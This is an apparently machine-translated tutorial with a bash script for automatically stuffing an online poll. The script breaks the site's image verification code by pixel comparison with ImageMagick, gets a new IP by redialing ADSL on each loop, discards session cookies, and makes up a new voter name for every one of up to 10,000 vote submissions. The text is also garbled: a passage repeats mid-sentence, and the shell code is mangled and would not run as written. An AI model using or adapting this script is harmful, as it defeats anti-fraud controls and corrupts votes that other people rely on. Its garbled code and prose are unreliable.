The idea is to first find an image containing a verification code, remove interference factors such as background, color, and stripe, and convert the image into black and white pixels for processing. Then, the position of each text on the image is analyzed, and the entire image is precisely divided into small images containing each text. . When intercepting the image, you must note that it is best to leave a border for each text and center the text on the small image after the screenshot, which is more conducive to eliminating interference and improving the recognition rate. To improve accuracy, I used GIMP to enlarge the verification code to 1600 times and then process each pixel. When you want to recognize the verification code on an image, extract the text from the image at the same position and compare it with the ten small images you just saved, the serial number of the image with the smallest difference is the text at the position. ImageMagick runs under the command line and supports comparison methods such as MAE, MSE, PSE, SNR, and RMSE. Based on the interference in the image, select the most appropriate method, or use multiple methods for comparison, the verification code can be easily identified.
It is easy to automatically add water after the verification code is identified. In linux, there is a more powerful tool, curl, which can access the remote server through HTTP, FTP, HTTPS and other methods, and automatically upload or download data. First, use curl to view its HTTP header information
1 * About to connect () to www.2cto.com port 80
2 * Trying xxx. xxx... * connected
3 * Connected to www.2cto.com (xxx. xxx) port 80
4> GET/HTTP/1.1
5 User-Agent: curl/7.13.1 (debian-linux-gnu) libcurl/7.13.1 OpenSSL/0.9.7e zlib/1.2.2.2 libidn/0.5.13
6 Host: www.2cto.com
7 Pragma: no-cache
8 Accept :*/*
9
10 <HTTP/1.1 302 Moved Temporarily
11 <Via: 1.1 PROXY
12 <Connection: Keep-Alive
13 <Proxy-Connection: Keep-Alive
14 <Transfer-Encoding: chunked
15 <Date: Tue, 04 Jul 2006 05:55:16 GMT
16 <Location: http://www.bkjia.com/queryVote. do? Type = netvotes & Group = 1
17 <Content-Type: text/html; charset = gb2312
18 <Server: WebLogic Server 8.1 SP2 Fri Dec 5 15:01:51 PST 2003 316284
19 <Set-Cookie: JSESSIONID = eqcedycc2jgex2slot231l6n1_ostzaff9zlshuxb2mxrqlbe1i! 1559900188; path =/
20
21 22 23 <meta http-equiv = "Content-Type" content = "text/html; charset = gb2312">
24 <title> xxxx </title>
25 26 <body bgcolor = "# FFFFFF">
27...
28 </body>
29 30
31 32 * Connection #0 to host www.2cto.com left intact
33 * Closing connection #0
34
From Row 3, we can see that the site uses the JSESSION cookie. View the source code of the voting page. I found that the POST method is used for voting, and five form items need to be submitted. I can record all of these to form a POST string.
As mentioned above, let's look at the code I wrote (the source website is changed to www.2cto.com)
1 #! /Bin/bash
2
3 # exec 1> curl. log
4
5 function parse
6 {
7 ret =
8 file = $1
9 convert unzip file.jpeg-crop 9x13 + 1 + 2 unzip file-a.jpeg
10 convert unzip file.jpeg-crop 9x13 + 10 + 2 unzip file-b.jpeg
11 convert unzip file.jpeg-crop 9x13 + 19 + 2 unzip file-c.jpeg
12 convert into file.jpeg-crop 9x13 + 28 + 2 into file-d.jpeg
13 for pic in {a, B, c, d}
14 do
15 dB = 1000000000 # a very high value
16 value = 10
17 for num in {0, 1, 2, 3, 4, 5, 6, 7, 8}
18 do
19 curr = 'compare-metric PSE encrypted file-$pic.jpeg xj-$num.jpeg null: | awk mentioned above is very cool. Check the code I wrote (the source URL is changed to www.2cto.com)
1 #! /Bin/bash
2
3 # exec 1> curl. log
4
5 function parse
6 {
7 ret =
8 file = $1
9 convert unzip file.jpeg-crop 9x13 + 1 + 2 unzip file-a.jpeg
10 convert unzip file.jpeg-crop 9x13 + 10 + 2 unzip file-b.jpeg
11 convert unzip file.jpeg-crop 9x13 + 19 + 2 unzip file-c.jpeg
12 convert into file.jpeg-crop 9x13 + 28 + 2 into file-d.jpeg
13 for pic in {a, B, c, d}
14 do
15 dB = 1000000000 # a very high value
16 value = 10
17 for num in {0, 1, 2, 3, 4, 5, 6, 7, 8}
18 do
19 curr = 'compare-metric PSE encrypt file-$pic.jpeg xj-$num.jpeg null: |
'{Print $1 }''
20 small = 'echo "$ curr <$ dB" | bc'
21 if [$ small-eq 1]; then
22 value = $ num
23 dB = $ curr
24 fi
25 done
26 ret = $ ret $ value
27 done
28 rm-fr limit file-0000abcd0000.jpeg
29 echo $ ret
30}
31
32
33 hit = 0
34 for (I = 1; I <10000; I ++ ))
35 do
36 pon dsl-provider>/dev/null 2> curl. log
37 sleep 3
38 curl-s/
39-c cookie/
40-j
/
41-A & quot; Mozilla/4.0 & quot "/
42 http://www.bkjia.com/MakeEXPWD> code.jpeg
43 code = $ (parse code)
44 curl-s/
45-B cookie/
46-d "tid = 35 "/
47-d "name = jerry $ (date + % s )"/
48-d "certid = 310902790504054 "/
49-d "tele= 23493451 "/
50-d "authcode = $ code "/
51-d "send = % 20 "/
52-e http://www.bkjia.com/VoteForm. jsp? TID = 35/
53-A & quot; Mozilla/4.0 & quot "/
54 http://www.bkjia.com/vote. do | grep-q 'vote successfully'
55 if [$? -Eq 0]; then
56 hit =$ ($ hit + 1 ))
57 echo-n-e "Total: $ I, Hit $ hit, Last: $ code/r"
58 else true
59 fi
60 rm-fr code.jpeg
61 poff dsl-provider>/dev/null 2> curl. log
62 done
63 exit 0
64
The third line in the Code redirects the output of the entire program to a file, which can be used for unattended batch running. If the program has a lot of input, you do not have to redirect each output one by one.
The following is the parse function used to identify the obtained image. During the analysis, we first take the pre-defined area of the image and compare it with the prepared small image one by one. Take the most value in the parameter, and the corresponding small image is the text at the position. Floating point operations are used for comparison, which is the weakness of bash. Therefore, high-precision computation is performed using bc. The compare command used to compare two images supports complex parameters and multiple methods, such as MAE, MSE, PSE, SNR, and RMSE.
The function is the main loop of the program. Adsl is disconnected and dialed again during each cycle. There may be a delay between successful dialing and normal data transmission, So sleep takes a while.
The first curl below has two functions: first, it obtains the image containing the verification code from the target website; in addition, it obtains the cookie of the current connection and initializes the session on the server. The-j parameter indicates that the previous cookie is discarded for each dial-up.
The second curl uses the cookie just obtained and uses the post method to submit the voting data to the target site. The name is the name of the voter, and the voting procedure requires that only one vote is allowed for the same name, so I simply expressed it with time. On the return page after the vote, check the word "Vote successful". If yes, the vote is successful, and the counter is incremented by one. $? Of row 55th? The Return Value of the previous command: 0 is returned when the keyword is found.
After each operation, you must delete the temporary file and update the status line. When the echo command is added with the-n parameter, it indicates that the output information is not followed by a line break. When a control character/r is added, the current prompt line can be updated continuously, instead of the output program running result in one line, this looks more concise.